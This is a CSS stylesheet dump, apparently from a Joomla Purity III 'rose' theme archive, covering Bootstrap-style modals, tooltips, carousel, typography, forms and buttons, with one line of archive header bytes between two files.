  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0px;
}
.well-sm {
  padding: 9px;
  border-radius: 0px;
}
.close {
  float: right;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  opacity: 0.2;
  filter: alpha(opacity=20);
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  opacity: 0.5;
  filter: alpha(opacity=50);
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  display: none;
  overflow: hidden;
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0px;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  background-clip: padding-box;
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
  min-height: 21.42857143px;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: right;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-left: 5px;
  margin-bottom: 0;
}
.modal-footer .btn-group .btn + .btn {
  margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-left: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 12px;
  font-weight: normal;
  line-height: 1.4;
  opacity: 0;
  filter: alpha(opacity=0);
}
.tooltip.in {
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.tooltip.top {
  margin-top: -3px;
  padding: 5px 0;
}
.tooltip.right {
  margin-left: 3px;
  padding: 0 5px;
}
.tooltip.bottom {
  margin-top: 3px;
  padding: 5px 0;
}
.tooltip.left {
  margin-left: -3px;
  padding: 0 5px;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  text-decoration: none;
  background-color: #000000;
  border-radius: 0px;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  bottom: 0;
  right: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  left: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.popover {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: left;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0px;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  white-space: normal;
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-left: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-left: -10px;
}
.popover-title {
  margin: 0;
  padding: 8px 14px;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1px -1px 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow:after {
  border-width: 10px;
  content: "";
}
.popover.top > .arrow {
  left: 50%;
  margin-left: -11px;
  border-bottom-width: 0;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  bottom: -11px;
}
.popover.top > .arrow:after {
  content: " ";
  bottom: 1px;
  margin-left: -10px;
  border-bottom-width: 0;
  border-top-color: #ffffff;
}
.popover.right > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover.right > .arrow:after {
  content: " ";
  left: 1px;
  bottom: -10px;
  border-left-width: 0;
  border-right-color: #ffffff;
}
.popover.bottom > .arrow {
  left: 50%;
  margin-left: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
  top: -11px;
}
.popover.bottom > .arrow:after {
  content: " ";
  top: 1px;
  margin-left: -10px;
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-right-width: 0;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  content: " ";
  right: 1px;
  border-right-width: 0;
  border-left-color: #ffffff;
  bottom: -10px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  overflow: hidden;
  width: 100%;
}
.carousel-inner > .item {
  display: none;
  position: relative;
  -webkit-transition: 0.6s ease-in-out left;
  -o-transition: 0.6s ease-in-out left;
  transition: 0.6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000;
    -moz-perspective: 1000;
    perspective: 1000;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    left: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    left: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  left: 100%;
}
.carousel-inner > .prev {
  left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  left: 0;
}
.carousel-inner > .active.left {
  left: -100%;
}
.carousel-inner > .active.right {
  left: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  width: 15%;
  opacity: 0.5;
  filter: alpha(opacity=50);
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
}
.carousel-control.right {
  left: auto;
  right: 0;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
}
.carousel-control:hover,
.carousel-control:focus {
  outline: 0;
  color: #ffffff;
  text-decoration: none;
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  margin-top: -10px;
  line-height: 1;
  font-family: serif;
}
.carousel-control .icon-prev:before {
  content: '\2039';
}
.carousel-control .icon-next:before {
  content: '\203a';
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  left: 50%;
  z-index: 15;
  width: 60%;
  margin-left: -30%;
  padding-left: 0;
  list-style: none;
  text-align: center;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  border: 1px solid #ffffff;
  border-radius: 10px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
}
.carousel-indicators .active {
  margin: 0;
  width: 12px;
  height: 12px;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  left: 15%;
  right: 15%;
  bottom: 20px;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -15px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-left: -15px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-right: -15px;
  }
  .carousel-caption {
    left: 20%;
    right: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-footer:before,
.modal-footer:after {
  content: " ";
  display: table;
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
.pull-right {
  float: right !important;
}
.pull-left {
  float: left !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKԜ�\AԼ��-purity_iii/local/css/themes/rose/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: left;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #db00af;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #8f0072;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: left;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #db00af;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: left;
}
.text-right {
  text-align: right;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-left: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-left: 0;
  list-style: none;
}
.list-inline {
  padding-left: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-left: 5px;
  padding-right: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-left: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: left;
    width: 160px;
    clear: left;
    text-align: right;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-left: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    content: " ";
    display: table;
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-left: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-right: 15px;
  padding-left: 0;
  border-right: 5px solid #eeeeee;
  border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: right;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:hover,
.btn-inverse:focus,
.btn-inverse.focus,
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  background-image: none;
}
.btn-inverse.disabled,
.btn-inverse[disabled],
fieldset[disabled] .btn-inverse,
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus,
.btn-inverse.disabled:active,
.btn-inverse[disabled]:active,
fieldset[disabled] .btn-inverse:active,
.btn-inverse.disabled.active,
.btn-inverse[disabled].active,
fieldset[disabled] .btn-inverse.active {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-left: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
